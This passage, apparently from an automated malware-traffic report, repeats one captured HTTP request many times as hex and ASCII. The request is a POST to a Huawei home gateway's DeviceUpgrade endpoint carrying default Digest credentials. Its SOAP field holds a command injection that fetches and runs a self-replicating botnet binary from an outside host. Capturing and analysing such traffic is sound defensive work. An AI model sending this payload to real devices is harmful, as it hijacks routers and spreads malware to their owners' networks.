70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 